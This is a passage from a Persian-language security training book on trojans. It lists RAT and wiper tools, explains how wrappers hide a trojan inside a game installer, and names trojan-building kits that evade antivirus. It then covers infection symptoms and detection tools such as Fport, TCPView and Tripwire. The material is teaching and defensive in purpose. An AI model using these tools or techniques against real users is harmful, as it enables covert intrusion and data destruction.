ﺑﺮﻧﺎﻣﻪ ﻫﺎي Hard Drive Killer Pro ، اﺟﺎزه ﺧﺮاب ﻛﺮدن ﻫﻤﻪ داده ﻫﺎ را ﺑﺮ روي ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ﻫﺎي وﻳﻨﺪوزي و DOS ﻣﻲ دﻫﺪ . زﻣﺎﻧﻴﻜﻪ ﺑﺮﻧﺎﻣﻪ اﺟﺮا ﺷﺪ، ﺗﻤﺎم ﻓﺎﻳﻞ ﻫﺎ را ﭘﺎك ﻣﻲ ﻛﻨﺪ و ﺳﻴﺴﺘﻢ را در ﻋﺮض ﭼﻨﺪ ﺛﺎﻧﻴﻪ رﻳﺴﺘﺎرت ﻣﻲ ﻛﻨﺪ . ﭘﺲ از رﻳﺴﺘﺎرت، ﺗﻤﺎم ﻫﺎردﻫﺎﻳﻲ ﻛﻪ ﺑﻪ ﺳﻴﺴﺘﻢ ﻣﺘﺼﻞ ﺷﺪه اﻧﺪ ( ﺑﺪون ﺗﻮﺟﻪ ﺑﻪ اﻧﺪازه آﻧﻬ )ﺎ ، در ﻋﺮض 1 ﻳﺎ 2 ﺛﺎﻧﻴﻪ، ﻓﺮﻣﺖ ﻣﻲ ﺷﻮﻧﺪ ﺑﻪ ﻧﺤﻮي ﻛﻪ ﻗﺎﺑﻞ ﺑﺎزﻳﺎﺑﻲ ﻧﻴﺴﺘﻨﺪ . .

ﺑﺮﺧﻲ دﻳﮕﺮ از اﺑﺰارﻫﺎ ﻋﺒﺎرﺗﻨﺪ از : Satellite- ، Turkojan ، DownTroj ، Biorante RAT ، T2W ، Backdoor.Theef HackerzRat ، SharK ، Rapid Hacker ، Poison Ivy ، Trojan.Hav-Rat ، DarkLabel B4 ، Yakoza ، RAT ، AccRat ، OD Client ، ProAgent ، Optix PRO ، VicSpy ، Criminal Rat Beta ، 1337 Fun Trojan ، TYO ، VNC Trojan ، TinyFTPD ، ZombieRat ، ConsoleDevil ، SINner ، RubyRAT Public ، Mhacker-PS ، DaCryptic ، Dark Girl ، ProRat ، Troya ، Biohazard RAT ، Skiddie Rat ، DJI RAT ، Webcam Trojan ، Hovdy.a ، PokerStealer.A ، Net-Devil . .

ﻧﺤﻮه ﻛﺎر ﺗﺮوﺟﺎن Netcat

Netcat ، ﺗﺮوﺟﺎﻧﻲ اﺳﺖ ﻛﻪ از اﻳﻨﺘﺮﻓﻴﺲ ﺧﻂ دﺳﺘﻮري ﺑﺮاي ﺑﺎز ﻛﺮدن ﭘﻮرت ﻫﺎي TCP ﻳﺎ UDP روي ﺳﻴﺴﺘﻢ ﻫﺪف اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ . ﺳﭙﺲ ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﺑﻪ اﻳﻦ ﭘﻮرت ﻫﺎ، telnet ﻛﻨﺪ و دﺳﺘﺮﺳﻲ shell ﺑﻪ ﺳﻴﺴﺘﻢ ﻫﺪف ﭘﻴﺪا ﻛﻨﺪ . .

ﻧﺸﺎﻧﻪ ﻫﺎي ﺣﻤﻠﻪ ﺗﺮوﺟﺎن ﭼﻴﺴﺖ؟

رﻓﺘﺎر ﻏﻴﺮ ﻣﻌﻤﻮل ﺳﻴﺴﺘﻢ، ﻣﻌﻤﻮﻻ ﻧﺸﺎﻧﻪ اي از ﺣﻤﻠﻪ ﺗﺮوﺟﺎن اﺳﺖ . ﻋﻤﻠﻴﺎﺗﻲ از ﻗﺒﻴﻞ اﺟﺮاي ﺑﺮﻧﺎﻣﻪ ﻫﺎ ﺑﺪون دﺧﺎﻟﺖ ﻛﺎرﺑﺮ، ﺑﺎز و ﺑﺴﺘﻪ ﺷﺪن CD-ROM ، ﺗﻐﻴﻴﺮ در ﺗﺼﻮﻳﺮ background ﻳﺎ screen saver ، ﻧﺸﺎن دادن وب ﺳﺎﻳﺖ ﻫﺎي ﻧﺎﺧﻮاﺳ ﺘﻪ ﺗﻮﺳﻂ ﺑﺮﻧﺎﻣﻪ ﻣﺮورﮔﺮ، ﻧﺸﺎﻧﻪ ﻫﺎﻳﻲ از ﺣﻤﻠﻪ ﺗﺮوﺟﺎن اﺳﺖ . ﻫﺮ ﻋﻤﻠﻲ ﻛﻪ ﺑﺪون ﻣﺪاﺧﻠﻪ ﻛﺎرﺑﺮ اﻧﺠﺎم ﺷﻮد، ﻧﺸﺎﻧﻪ اي از ﺣﻤﻠﻪ ﺗﺮوﺟﺎن اﺳﺖ . .

ﺑﺮﺧﻲ دﻳﮕﺮ از ﻋﻼﺋﻢ ﺣﻤﻠﻪ ﺗﺮوﺟﺎن ﻋﺒﺎرﺗﻨﺪ از : :

• ﻓﺎﻳﻞ ﻫﺎﻳﻲ ﺑﺼﻮرت ﺧﻮدﻛﺎر از ﭘﺮﻳﻨﺘﺮ، ﭘﺮﻳﻨﺖ ﮔﺮﻓﺘﻪ ﻣﻲ ﺷﻮﻧﺪ. • ﻛﻠﻴﺪﻫﺎي راﺳﺖ و ﭼﭗ ﻣﺎوس، ﺑﺼﻮرت ﻣﻌﻜﻮس ﻛﺎر ﻣﻲ ﻛﻨﻨﺪ. • ﻧﺸﺎﻧﮕﺮ ﻣﺎوس، ﻧﺎﭘﺪﻳﺪ ﻣﻲ ﺷﻮد. 95

• ﻧﺸﺎﻧﮕﺮ ﻣﺎوس ﺟﺎﺑﺠﺎ ﻣﻲ ﺷﻮد. • دﻛﻤﻪ Start وﻳﻨﺪوز ﻧﺎﭘﺪﻳﺪ ﻣﻲ ﺷﻮد. • ﺷﺮﻛﺖ ISP ﺑﻪ ﻛﺎرﺑﺮ اﻋﺘﺮاض ﻣﻲ ﻛﻨﺪ ﻛﻪ ﻛﺎﻣﭙﻴﻮﺗﺮش، ﻋﻤﻠﻴﺎت IP scanning اﻧﺠﺎم ﻣﻲ دﻫﺪ. • اﻓﺮادي ﻛﻪ ﺑﺎ ﻗﺮﺑﺎﻧﻲ ﭼﺖ ﻣﻲ ﻛﻨﻨﺪ، اﻃﻼﻋﺎت ﺷﺨﺼﻲ زﻳﺎدي درﺑﺎره او ﻳﺎ ﻛﺎﻣﭙﻴﻮﺗ ﺮش ﻣﻲ داﻧﻨﺪ. • ﻛﺎﻣﭙﻴﻮﺗﺮ ﺑﺼﻮرت ﺧﻮد ﺑﻪ ﺧﻮد ﺧﺎﻣﻮ ش ﻣﻲ ﺷﻮد. • ﻧﻮار taskbar ، ﻧﺎﭘﺪﻳﺪ ﻣﻲ ﺷﻮد. • ﭘﺴﻮردﻫﺎي اﻛﺎﻧﺖ ﻫﺎ ﺗﻐﻴﻴﺮ ﻣﻲ ﻛﻨﻨﺪ ﻳﺎ اﺷﺨﺎص دﻳﮕﺮي ﻣﻲ ﺗﻮاﻧﻨﺪ ﺑﻪ اﻛﺎﻧﺖ ﻫﺎ دﺳﺘﺮﺳﻲ داﺷﺘﻪ ﺑﺎﺷﻨﺪ. • ﺧﺮﻳﺪﻫﺎي ﻋﺠﻴﺒﻲ در ﺻﻮرﺗﺤﺴﺎب ﻛﺎرت اﻋﺘﺒﺎري ﻣﺸﺎﻫﺪه ﻣﻲ ﺷﻮد. • ﻣﺎﻧﻴﺘﻮر ﻛﺎﻣﭙﻴﻮﺗﺮ، ﺧﻮد ﺑﻪ ﺧﻮد ﺧﺎ ﻣﻮش و روﺷﻦ ﻣﻲ ﺷﻮد. • ﻣﻮدم ﺑﺼﻮرت ﺧﻮد ﺑﻪ ﺧﻮد ﺑﻪ اﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﻣﻲ ﺷﻮد. • ﻛﻠﻴﺪﻫﺎي Ctrl+Alt+Del ﻛﺎر ﻧﻤﻲ ﻛﻨﻨﺪ. • وﻗﺘﻲ ﻛﺎﻣﭙﻴﻮﺗﺮ راه اﻧﺪازي ﻣﻲ ﺷﻮد، ﭘﻴﻐﺎﻣﻲ ﻇﺎﻫﺮ ﻣﻲ ﺷﻮد ﻛﻪ ﻛﺎرﺑﺮ دﻳﮕﺮي ﺑﻪ ﺳﻴﺴﺘﻢ ﻣﺘﺼﻞ اﺳﺖ.

Wrapping ﭼﻴﺴﺖ؟

Wrapper ﻫﺎ ﻧﺮم اﻓﺰارﻫﺎﻳﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺮاي ﺗﺤﻮﻳﻞ ﺗﺮوﺟﺎن ﻣﻮرد اﺳﺘﻔﺎده ﻗﺮار ﻣﻲ ﮔﻴﺮﻧﺪ . اﻳﻦ ﻧﺮم اﻓﺰارﻫﺎ، ﺗﺮوﺟﺎن را ﺑﻪ ﻳﻚ ﻓﺎﻳﻞ ﻣﻌﻤﻮﻟﻲ ﻣﻲ ﭼﺴﺒﺎﻧﻨﺪ . ﻫﺮ دوي اﻳﻦ ﻓﺎﻳﻞ ﻫﺎ داﺧﻞ ﻳﻚ ﻓﺎﻳﻞ اﺟﺮاﻳﻲ ﺗﺮﻛﻴﺐ ﻣﻲ ﺷﻮﻧﺪ و زﻣﺎﻧﻴﻜﻪ ﺑﺮﻧﺎﻣﻪ اﺟﺮا ﻣﻲ ﺷﻮد، ﻧﺼﺐ ﻣﻲ ﺷﻮد . ﺑﻄﻮر ﻛﻠﻲ، ﺑﺎزي ﻫﺎ ﺑﻪ ﻋﻨﻮان wrapper ﻫﺎ ﻣﻮرد اﺳﺘﻔﺎده ﻗﺮار ﻣﻲ ﮔﻴﺮﻧﺪ ﺑﺮاي اﻳﻨﻜﻪ زﻣﺎﻧﻴﻜﻪ ﺗﺮوﺟﺎن در ﺣﺎل ﻧﺼﺐ اﺳﺖ ﻛﺎرﺑﺮ را ﻣﺸﻐﻮل ﻣﻲ ﻛﻨﺪ . از اﻳﻦ رو، زﻣﺎﻧﻴﻜﻪ ﺗﺮوﺟﺎن در ﺣﺎل ﻧﺼﺐ ﺑﺮ روي ﺳﻴﺴﺘﻢ اﺳﺖ، ﻛﺎرﺑﺮ ﻣﺘﻮﺟﻪ ﻛﻨﺪي ﺳﻴﺴﺘﻢ ﻧﻤﻲ ﺷﻮد و ﺗﻨﻬﺎ ﺑﺮﻧﺎﻣﻪ ﺧﻮد را ﻣﻲ ﺑﻴﻨﺪ ﻛﻪ در ﺣﺎل ﻧﺼﺐ اﺳﺖ . .

96

اﺑﺰارﻫﺎي ﻫﻚ Graffiti ، ﻳﻚ ﺑﺎزي اﻧﻴﻤﺸﻨﻲ اﺳﺖ ﻛﻪ ﻣﻲ ﺗﻮاﻧﺪ ﺑﺎ ﻳﻚ ﺗﺮوﺟﺎن ﺗﺮﻛﻴﺐ ﺷﻮد . اﻳﻦ ﺑﺎزي، ﻛﺎرﺑﺮ را ﻣﺸﻐﻮل ﻧﮕﻪ ﻣﻲ دارد ﺗﺎ ﺗﺮوﺟﺎن در ﭘﺸﺖ زﻣﻴﻨﻪ ﻧﺼﺐ ﺷﻮد . اﻳﻦ ﺑﺮﻧﺎﻣﻪ زﻣﺎﻧﻴﻜﻪ ﻛﺎﻣ ﭙﻴﻮﺗﺮ راه اﻧﺪازي ﺷﺪ، اﺟﺮا ﻣﻲ ﺷﻮد و ﻛﺎﻣﭙﻴﻮﺗﺮ را ﻣﺸﻐﻮل ﻧﮕﻪ ﻣﻲ دارد ﺗﺎ ﻣﺘﻮﺟﻪ ﻧﺼﺐ ﺗﺮوﺟﺎن ﻧﺸﻮد . .

RemoteByMail ، ﻛﺎﻣﭙﻴﻮﺗﺮ ﻗﺮﺑﺎﻧﻲ را ﺑﺎ اﺳﺘﻔﺎده از اﻳﻤﻴﻞ ﻛﻨﺘ ﺮل ﻣﻲ ﻛﻨﺪ . ﺑﺎ ارﺳﺎل دﺳﺘﻮرات از ﻃﺮﻳﻖ اﻳﻤﻴﻞ، ﻣﻲ ﺗﻮاﻧﺪ ﻓﺎﻳﻞ ﻫﺎ ﻳﺎ ﻓﻮﻟﺪرﻫﺎ را از ﻛﺎﻣﭙﻴﻮﺗﺮ ﻗﺮﺑﺎﻧﻲ ﺑﺎزﻳﺎﺑﻲ ﻛﻨﺪ . .

Silk Rope 2000 ، ﻳﻚ wrapper اﺳﺖ ﻛﻪ BackOrifice server و ﻫﺮ ﺑﺮﻧﺎﻣﻪ ﻣﺸﺨﺺ دﻳﮕﺮ را ﺑﺎ ﻫﻢ ﺗﺮﻛﻴﺐ ﻣﻲ ﻛﻨﺪ . .

EliTeWrap ، ﺑﺮﻧﺎﻣﻪ wrapper ﭘﻴﺸﺮﻓﺘﻪ ﺗﺤﺖ وﻳﻨﺪوز اﺳﺖ ﻛﻪ ﺑﺮاي ﻧﺼﺐ و اﺟﺮاﻳﻲ ﺑﺮﻧﺎﻣﻪ ﻫﺎ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد . EliTeWrap ، ﻣﻲ ﺗﻮاﻧﺪ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﻧﺼﺒﻲ ﺑﺮاي ﻛﭙﻲ ﻓﺎﻳﻞ ﻫﺎي داﺧﻞ ﻳﻚ داﻳﺮﻛﺘﻮري و اﺟﺮاي ﺑﺮﻧﺎﻣﻪ ﻫﺎ ﻳﺎ ﻓﺎﻳﻞ ﻫﺎي دﺳﺘﻪ اي اﺳﺘﻔﺎده ﺷﻮد . .

IconPlus ، ﺑﺮﻧﺎﻣﻪ اي ﺑﺮاي ﺗﺮﺟﻤﻪ آﻳﻜﻦ ﻫﺎ ﺑﻪ ﻓﺮﻣﺖ ﻫﺎي ﻣﺨﺘﻠﻒ اﺳﺖ . ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ از اﻳﻦ ﺑﺮﻧﺎﻣﻪ ﻫﺎ ﺑﺮاي ﭘﻨﻬﺎن ﻛﺮدن ﻛﺪﻫﺎي ﻣﺨﺮب ﻳﺎ ﺗﺮوﺟﺎن اﺳﺘﻔﺎده ﻛﻨﺪ ﺑﻨﺎﺑﺮاﻳﻦ، ﻛﺎرﺑﺮان ﻓﺮﻳﺐ ﻣﻲ ﺧﻮرﻧﺪ و آن را اﺟﺮا ﻣﻲ ﻛﻨﻨﺪ و ﮔﻤﺎن ﻣﻲ ﻛﻨﻨﺪ ﻛﻪ آن ﻳﻚ ﻓﺎﻳﻞ ﻣﻌﻤﻮﻟﻲ اﺳﺖ . .

اﺑﺰارﻫﺎي ﺳﺎﺧﺖ ﺗﺮوﺟﺎن

اﺑﺰارﻫﺎي زﻳﺎدي ﺑﺮاي ﺳﺎﺧﺖ ﺗﺮوﺟﺎن وﺟﻮد دارد ﻛﻪ ﺑﻪ ﻫﻜﺮﻫﺎ در ﺳﺎﺧﺖ ﺗﺮوﺟﺎن ﻣﻮرد ﻧﻈﺮﺷﺎن ﻛﻤﻚ ﻣﻲ ﻛﻨﺪ . اﻳﻦ اﺑﺰارﻫﺎ ﺑﻪ ﻫﻜﺮﻫﺎ ﺑﺮاي ﺳﺎﺧﺖ ﺗﺮوﺟﺎن ﺳﻔﺎرﺷﻲ ﺷﺪه ﻛﻤﻚ ﻣﻲ ﺪﻨﻛﻨ و اﮔﺮ ﺑﻪ درﺳﺘﻲ اﺳﺘﻔﺎده ﻧ ﺸﻮﻧﺪ، ﺧﻄﺮﻧﺎك ﻣﻲ ﺷﻮﻧﺪ و ﻣﻲ ﻧﺗﻮا ﻨﺪ آﺳﻴﺐ ﺑ ﺮﺳﺎﻧ ﺪﻨ . ﺗﺮوﺟﺎن ﻫﺎﻳﻲ ﻛﻪ ﺑﺎ اﺳﺘﻔﺎده از اﻳﻦ اﺑﺰارﻫﺎ و ﺑﺼﻮرت ﺳﻔﺎرﺷﻲ ﺳﺎﺧﺘﻪ ﻣﻲ ﺷﻮﻧﺪ ﻳﻚ ﻣﺰﻳﺖ ﺑﺰرگ دارﻧﺪ و آن اﻳﻨﺴﺖ ﻛﻪ از دﺳﺖ ﻧﺮم اﻓﺰارﻫﺎي آﻧﺘﻲ وﻳﺮوس ﻣﺨﻔﻲ ﻣﻲ ﻣﺎﻧﻨﺪ ﺑﺮاي اﻳﻨﻜﻪ ﺑﺎ ﻫﻴﭽﻜﺪام از signature ﻫﺎﻳﻲ ﻛﻪ در ﻧﺮم اﻓﺰار آﻧﺘﻲ وﻳﺮوس وﺟﻮد دارﻧﺪ، ﻣﺸﺎﺑﻪ ﻧﻴﺴﺘﻨﺪ . .

ﺑﺮﺧﻲ از اﺑﺰارﻫﺎي ﺳﺎﺧﺖ ﺗﺮوﺟﺎن ﻋﺒﺎرﺗﻨﺪ از : Trojan Horse Construction Kit ، Senna Spy Generetor Progenic Mail Trojan Construction Kit ، v2.0 ، و Pandora’s Box . .

97

ﺗﻜﻨﻴﻚ ﻫﺎي ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺗﺮوﺟﺎن ﻫﺎ ﭼﻴﺴﺖ؟

ﺑﺴﻴﺎري از ﻧﺮماﻓﺰارﻫﺎي آﻧﺘﻲ وﻳﺮوس، ﻗﺎﺑﻠﻴﺘﻬﺎي آﻧﺘﻲ ﺗﺮوﺟﺎن و ﺗﺸﺨﻴﺺ spyware را دارﻧﺪ . اﻳﻦ اﺑﺰارﻫﺎ ﻣﻲ ﺗﻮاﻧﻨﺪ در زﻣﺎن آﻏﺎز ﺑﻪ ﻛﺎر ﻛﺎﻣﭙﻴﻮﺗﺮ، ﺑﺼﻮرت ﺧﻮدﻛﺎر دراﻳﻮﻫﺎ را اﺳﻜﻦ ﻛﻨﻨﺪ ﺗﺎ backdoor ﻫﺎ و ﺗﺮوﺟﺎن ﻫﺎ را ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﻨﺪ . زﻣﺎﻧﻴﻜﻪ ﺳﻴﺴﺘﻤﻲ آﻟﻮده ﺷﺪ، ﭘﺎﻛﺴﺎزي آن ﺑﺴﻴﺎر دﺷﻮار ﻣﻲ ﺷﻮد اﻣﺎ ﺷﻤﺎ ﻣﻲ ﺗﻮاﻧﻴﺪ ﺑﺎ اﺑﺰارﻫﺎي ﺗﺠﺎري در دﺳﺘﺮس ، اﻳﻨﻜﺎر را اﻧﺠﺎم دﻫﻴﺪ . .

ﻣﻬﻢ اﺳﺖ ﻛﻪ ﺑﻪ ﺟﺎي اﺳﺘﻔﺎده از اﺑﺰارﻫﺎي راﻳﮕﺎن، از ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﺗﺠﺎري ﺑﺮاي ﭘﺎﻛﺴﺎزي ﻳﻚ ﺳﻴﺴﺘﻢ اﺳﺘﻔﺎده ﻛﻨﻴﺪ ﺑﺮاي اﻳﻨﻜﻪ ﺑﺴﻴﺎري از اﺑﺰارﻫﺎي راﻳﮕﺎن، ﻣﻲ ﺗﻮاﻧﻨﺪ ﺳﻴﺴﺘﻢ را آﻟﻮده ﻛﻨﻨﺪ . ﻋﻼوه ﺑﺮ اﻳﻦ، اﺑﺰارﻫﺎي ﻣﺎﻧﻴﺘﻮرﻳﻨﮓ ﭘﻮرت، ﻣﻲ ﺗﻮاﻧﻨﺪ ﭘﻮرت ﻫﺎﻳﻲ ﻛﻪ ﺑﺎز ﻫﺴﺘﻨﺪ ﻳﺎ ﻓﺎﻳﻞ ﻫﺎﻳﻲ ﻛﻪ ﺗﻐﻴﻴﺮ ﻳﺎﻓﺘﻪ اﻧﺪ را ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﻨﺪ . .

ﺗﻜﻨﻴﻚ ﻫﺎي ﮔﺮﻳﺰ از ﺗﺮوﺟﺎن

ﻛﻠﻴﺪ ﺟﻠﻮﮔﻴﺮي از ﻧﺼﺐ ﺗﺮوﺟﺎن ﻫﺎ و backdoor ﻫﺎ اﻳﻨﺴﺖ ﻛﻪ ﺑﻪ ﻛﺎرﺑﺮان آﻣﻮزش دﻫﻴﺪ ﺗﺎ ﺑﺮﻧﺎﻣﻪ ﻫﺎ را از اﻳﻨﺘﺮﻧﺖ داﻧﻠﻮد ﻧﻜﻨﻨﺪ و ﺿﻤﺎﺋﻢ اﻳﻤﻴﻞ ﻫﺎﻳﻲ ﻛﻪ ﻓﺮﺳﺘﻨﺪه آن را ﻧﻤﻲ ﺷﻨﺎﺳﻨﺪ را ﺑﺎز ﻧﻜﻨﻨﺪ . ﺑﻪ ﻫﻤﻴﻦ دﻟﻴﻞ، ﺑﺴﻴﺎري از ﻣﺪﻳﺮان ﺳﻴﺴﺘﻢ ﻫﺎ، اﺟﺎزه ﻧﺼﺐ ﺑﺮﻧﺎﻣﻪ را ﺑﻪ ﻛﺎرﺑﺮان ﺧﻮد ﻧﻤﻲ دﻫﻨﺪ . .

98

ﭼﮕﻮﻧﻪ ﺗﺮوﺟﺎن را ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﻴﻢ؟

• ﭘﻮرت را ﺑﺎ اﺳﺘﻔﺎده از اﺑﺰارﻫﺎﻳﻲ ﻫﻤﭽﻮن Fport ، Netstat ، و TCPView اﺳﻜﻦ ﻛﻨﻴﺪ ﺗﺎ ﭘﻮرت ﻫﺎي ﺑﺎز ﻣﺸﻜﻮك را ﭘﻴﺪا ﻛﻨﻴﺪ. • ﭘﺮدازش ﻫﺎي در ﺣﺎل اﺟﺮا ﺑﺎ اﺳﺘﻔﺎده از Insider ، What's on my computer ، Process Viewer اﺳﻜﻦ ﻛﻨﻴﺪ ﺗﺎ ﭘﺮدازش ﻫﺎي ﻣﺸﻜﻮك را ﺑﺒﻴﻨﻴﺪ. • ﺑﺎ اﺳﺘﻔﺎده از اﺑﺰارﻫﺎﻳﻲ ﻫﻤﭽﻮن What's on my computer و MS Config ، رﺟﻴﺴﺘﺮي را اﺳﻜﻦ ﻛﻨﻴﺪ ﺗﺎ ورودي ﻫﺎي ﻣﺸﻜﻮك را ﭘﻴﺪا ﻛﻨﻴﺪ. • ﻓﻌﺎﻟﻴﺖ ﻫﺎي ﻣﺸﻜﻮك ﺷﺒﻜﻪ را ﺑﺎ اﺳﺘﻔﺎده از Ethereal اﺳﻜﻦ ﻛﻨﻴﺪ. • از Trojan scanner ﻫﺎ ﺑﺮاي ﻳﺎﻓﺘﻦ ﺗﺮوﺟﺎن ﻫﺎ اﺳﺘﻔﺎده ﻛﻨﻴﺪ . .

اﺑﺰارﻫﺎي Port-Monitoring and Trojan-Detection

Fport ، ﺗﻤﺎم ﭘﻮرت ﻫﺎي ﺑﺎز TCP و UDP را ﻧﺸﺎن ﻣﻲ دﻫﺪ . ﺷﻤﺎ ﻣﻲ ﺗﻮاﻧﻴﺪ از fport ﺑﺮاي ﺷﻨﺎﺳﺎﻳﻲ ﭘﻮرت ﻫﺎي ﺑﺎز و ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﻣﺮﺑﻮط ﺑﻪ ﻫﺮ ﭘﻮرت اﺳﺘﻔﺎده ﻛﻨﻴﺪ . .

Dsniff ، ﻣﺠﻤﻮﻋﻪ اي از اﺑﺰارﻫﺎ اﺳﺖ ﻛﻪ ﺑﺮاي ﺑﺮرﺳﻲ ﺷﺒﻜﻪ و ﺗﺴﺖ ﻧﻔﻮذ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد . filesnarf ، Dsniff ، urlsnarf ، msgsnarf ، mailsnarf ، و WebSpy ﺷﺒﻜﻪ را ﺑﺼﻮرت ﭘﺴﻴﻮ ﻣﺎﻧﻴﺘﻮر ﻣﻲ ﻛﻨﻨﺪ ﺗﺎ داده ﻫﺎ ﻣﻬﻢ از ﻗﺒﻴﻞ ﭘﺴﻮردﻫﺎ، اﻳﻤﻴﻞ، و اﻧﺘﻘﺎﻻت ﻓﺎﻳﻞ ﻫﺎ را ﭘﻴﺪا ﻛﻨﺪ . Sshmitm و webmitm ، ﺣﻤﻼت man-in-the-middle را ﺑﺮاي ﻧﺸﺴﺖ ﻫﺎي SSH و HTTP ﺑﺮ روي HTTPS ) SSL ) اﻧﺠﺎم ﻣﻲ دﻫﻨﺪ . .

PrcView ، ﺑﺮﻧﺎﻣﻪ ﻣﺸﺎﻫﺪه ﭘﺮدازش ﻫﺎ اﺳﺖ ﻛﻪ اﻃﻼﻋﺎت ﺟﺰﺋﻲ درﺑﺎره ﭘﺮدازش ﻫﺎﻳﻲ ﻛﻪ در وﻳﻨﺪوز در ﺣﺎل اﺟﺮا ﻫﺴﺘﻨﺪ را ﻧﺸﺎن ﻣﻲ دﻫﺪ . PrcView ، ﻧﺴﺨﻪ دﺳﺘﻮري اﺳﺖ ﻛﻪ ﻣﻲ ﺗﻮاﻧﻴﺪ ﺑﺮاي ﻧﻮﺷﺘﻦ اﺳﻜﺮﻳﭙﺖ اﺳﺘ ﻔﺎده ﻛﻨﻴﺪ ﺗﺎ ﺑﺒﻴﻨﻴﺪ آﻳﺎ ﭘﺮدازﺷﻲ در ﺣﺎل اﺟﺮا اﺳﺖ و ﻳﺎ آن را ﻣﺘﻮﻗﻒ ﺳﺎزﻳﺪ . .

Inzider ، اﺑﺰاري ﻣﻔﻴﺪ اﺳﺖ ﻛﻪ ﭘﺮدازش ﻫﺎي وﻳﻨﺪوز و ﭘﻮرت ﻫﺎﻳﻲ ﻛﻪ ﻫﺮ ﻛﺪام ﮔﻮش ﻣﻲ دﻫﻨﺪ را ﻟﻴﺴﺖ ﻣﻲ ﻛﻨﺪ . Inzider ، ﺑﺮﺧﻲ از ﺗﺮوﺟﺎن ﻫﺎ را ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲ ﻛﻨﺪ . ﺑﺮاي ﻧﻤﻮﻧﻪ BackOriffice ، ﺧﻮد را داﺧﻞ ﭘﺮدازش ﻫﺎي دﻳﮕﺮ ﺗﺰرﻳﻖ ﻣﻲ ﻛﻨﺪ ﺑﻨﺎﺑﺮاﻳﻦ، در Task Manager ﺑﻪ ﻋﻨﻮان ﭘﺮدازش ﺟﺪاﮔﺎﻧﻪ ﻧﺸﺎن داده ﻧﻤﻲ ﺷﻮد اﻣﺎ ﭘﻮرﺗﻲ را ﺑﺎز ﻣﻲ ﻛﻨﺪ ﻛﻪ ﺑﻪ آن ﮔﻮش ﻣﻲ دﻫﺪ . .

TCPView ، ﺑﺮﻧﺎﻣﻪ وﻳﻨﺪوزي اﺳﺖ ﻛﻪ ﻟﻴﺴﺖ ﺗﻤﺎم endpoint ﻫﺎي TCP و UDP را در ﺳﻴﺴﺘﻢ ﻧﺸﺎن ﻣﻲ دﻫﺪ از ﺟﻤﻠﻪ آدرس ﻫﺎي ﻣﺤﻠﻲ و راه دور و وﺿﻌﻴﺖ ارﺗﺒﺎﻃﺎت . .

99

Tripwire ، ﻳﻜﭙﺎرﭼﮕﻲ ﺳﻴﺴﺘﻢ را ﺑﺮرﺳﻲ ﻣﻲ ﻛﻨﺪ . از ﺗﻤﺎم ﻓﺎﻳﻞ ﻫﺎي ﻛﻠﻴﺪي ﺳﻴﺴﺘﻢ ﻳﺎ ﻫﺮ ﻓﺎﻳﻠﻲ ﻛﻪ ﺑﺎﻳﺪ ﻣﺎﻧﻴﺘﻮر ﺷﻮد، hash ﻫﺎ را ﺑﺼﻮرت ﺧﻮدﻛﺎر ﻣﻲ ﺳﺎزد . ﻧﺮم اﻓﺰار Tripwire ، ﺑﺼﻮرت دوره اي آن ﻓﺎﻳﻞ ﻫﺎ را اﺳﻜﻦ ﻣﻲ ﻛﻨﺪ و اﻃﻼﻋﺎت را دوﺑﺎره ﻣﺤﺎﺳﺒﻪ ﻣﻲ ﻛﻨﺪ و ﺑﺮرﺳﻲ ﻣﻲ ﻛﻨﺪ ﻛﻪ آﻳﺎ اﻃﻼﻋﺎﺗﻲ ﺗﻐﻴﻴﺮ ﻛﺮده اﺳﺖ ﻳﺎ ﻧﻪ . و اﮔﺮ ﺗﻐﻴﻴﺮي ﺣﺎﺻﻞ ﺷﺪه ﺑﺎﺷﺪ، ﭘﻴﻐﺎم ﻫﺸﺪاري ﻣﻲ دﻫﺪ . .

ﺑﺮﺧﻲ دﻳﮕﺮ از اﺑﺰارﻫﺎ ﻋﺒﺎرﺗﻨﺪ از : Hijack ، Autoruns ، What's Running ، Super System Helper ، CurrPorts Startup List ، This . .

ﺑﺮرﺳﻲ ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ ﺑﺮاي ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺗﺮوﺟﺎن

وﻳﻨﺪوز ﺳﺮور 2003 ، داراي ﻗﺎﺑﻠﻴﺘﻲ ﺑﻪ ﻧﺎم Windows File Protection ) WFP ) اﺳﺖ ﻛﻪ از ﺟﺎﻳﮕﺰﻳﻨﻲ ﻓﺎﻳﻞ ﻫﺎي ﻣﺤﺎﻓﻈﺖ ﺷﺪه ﺟﻠﻮﮔﻴﺮي ﻣﻲ ﻛﻨﺪ . زﻣﺎﻧﻴﻜﻪ ﺗﻼﺷﻲ ﺑﺮاي ﻧﻮﺷﺘﻦ ﻓﺎﻳﻞ TTF ، OCX ، DLL ، SYS ﻳﺎ EXE اﻧﺠﺎم ﻣﻲ ﺷﻮد، WFP ، ﻳﻜﭙﺎرﭼﮕﻲ ﻓﺎﻳﻞ را ﺑﺮرﺳﻲ ﻣﻲ ﻛﻨﺪ . اﻳﻦ ﺳﺒﺐ ﻣﻲ ﺷﻮد ﻛﻪ ﻣﻄﻤﺌﻦ ﺷﻮﻳﻢ ﺗﻨﻬﺎ ﻓﺎﻳﻞ ﻫﺎي ﻣﻮرد ﺗﺎﺋﻴﺪ ﻣﺎﻳﻜﺮوﺳﺎﻓﺖ ﺑﺮاي ﺟﺎﻳﮕﺰﻳﻨﻲ ﻓﺎﻳﻞ ﻫﺎي ﺳﻴﺴﺘﻤﻲ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد . .

